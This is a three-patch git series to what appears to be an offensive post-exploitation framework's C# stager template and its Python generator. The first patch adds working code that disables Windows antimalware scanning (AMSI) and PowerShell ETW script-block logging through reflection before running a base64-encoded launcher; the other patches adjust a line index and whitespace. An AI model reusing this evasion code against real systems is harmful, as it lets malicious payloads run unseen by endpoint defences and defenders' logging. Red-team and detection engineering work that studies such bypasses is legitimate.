From e9a3726e73135b126ec9f3d2e0df35169652d091 Mon Sep 17 00:00:00 2001
From: Philippe Pepos Petitclerc <ppeposp@gmail.com>
Date: Sun, 14 Oct 2018 13:01:37 -0400
Subject: [PATCH 1/3] Add Amsi and SBL bypasses to the CSharp stager.

The bypasses are the same ones used in the powershell launcher.
---
 .../cSharpTemplateResources/cmd/cmd/Program.cs | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)

diff --git a/data/misc/cSharpTemplateResources/cmd/cmd/Program.cs b/data/misc/cSharpTemplateResources/cmd/cmd/Program.cs
index 72c55a9bd..d68e5e29f 100644
--- a/data/misc/cSharpTemplateResources/cmd/cmd/Program.cs
+++ b/data/misc/cSharpTemplateResources/cmd/cmd/Program.cs
@@ -8,6 +8,7 @@
  */
 using System;
 using System.Text;
+using System.Reflection;
 using System.Management.Automation; 
 using System.Management.Automation.Runspaces; 
 
@@ -17,6 +18,8 @@ class Program
 	{
 		public static void Main(string[] args)
 		{
+            BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static;
+
 			string stager = " YOUR CODE GOES HERE";
 			var decodedScript = Encoding.Unicode.GetString(Convert.FromBase64String(stager));
 
@@ -25,10 +28,25 @@ public static void Main(string[] args)
             RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
             Pipeline pipeline = runspace.CreatePipeline();
 
+            var PSEtwLogProvider = pipeline.Commands.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
+            if (PSEtwLogProvider != null)
+            {
+                var EtwProvider = PSEtwLogProvider.GetField("etwProvider", flags);
+                var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
+                EtwProvider.SetValue(null, EventProvider);
+            }
+
+            var amsiUtils = pipeline.Commands.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
+            if (amsiUtils != null)
+            {
+                amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true);
+            }
+
             pipeline.Commands.AddScript(decodedScript);
 
             pipeline.Commands.Add("Out-Default");
             pipeline.Invoke();
+
         }
 	}
 }

From 187f187ec69ebc9e961677c384fd551e45f6a404 Mon Sep 17 00:00:00 2001
From: Philippe Pepos Petitclerc <ppeposp@gmail.com>
Date: Sun, 14 Oct 2018 13:24:01 -0400
Subject: [PATCH 2/3] Adjust cs stager module for new template.

---
 lib/stagers/windows/csharp_exe.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/stagers/windows/csharp_exe.py b/lib/stagers/windows/csharp_exe.py
index 2c0b5d912..ab7bf1479 100644
--- a/lib/stagers/windows/csharp_exe.py
+++ b/lib/stagers/windows/csharp_exe.py
@@ -125,7 +125,7 @@ def generate(self):
                 shutil.copytree(directory,destdirectory)
 
                 lines = open(destdirectory + 'cmd/Program.cs').read().splitlines()
-                lines[19] = "\t\t\tstring stager = \"" + launcherCode + "\";"
+                lines[17] = "\t\t\tstring stager = \"" + launcherCode + "\";"
                 open(destdirectory + 'cmd/Program.cs','w').write('\n'.join(lines))
                 shutil.make_archive(outfile,'zip',destdirectory)
                 shutil.rmtree(destdirectory)

From 5590ea1db8a83d6e078efbb49c210cf55c423f2e Mon Sep 17 00:00:00 2001
From: Philippe Pepos Petitclerc <ppeposp@gmail.com>
Date: Sun, 14 Oct 2018 13:03:13 -0400
Subject: [PATCH 3/3] Fix whitespaces/empty lines

---
 data/misc/cSharpTemplateResources/cmd/cmd/Program.cs | 10 ++--------
 1 file changed, 2 insertions(+), 8 deletions(-)

diff --git a/data/misc/cSharpTemplateResources/cmd/cmd/Program.cs b/data/misc/cSharpTemplateResources/cmd/cmd/Program.cs
index d68e5e29f..43adfbe6f 100644
--- a/data/misc/cSharpTemplateResources/cmd/cmd/Program.cs
+++ b/data/misc/cSharpTemplateResources/cmd/cmd/Program.cs
@@ -1,16 +1,11 @@
 /*
- * 
  * You may compile this in Visual Studio or SharpDevelop etc.
- * 
- * 
- * 
- * 
  */
 using System;
 using System.Text;
 using System.Reflection;
-using System.Management.Automation; 
-using System.Management.Automation.Runspaces; 
+using System.Management.Automation;
+using System.Management.Automation.Runspaces;
 
 namespace cmd
 {
@@ -46,7 +41,6 @@ public static void Main(string[] args)
 
             pipeline.Commands.Add("Out-Default");
             pipeline.Invoke();
-
         }
 	}
 }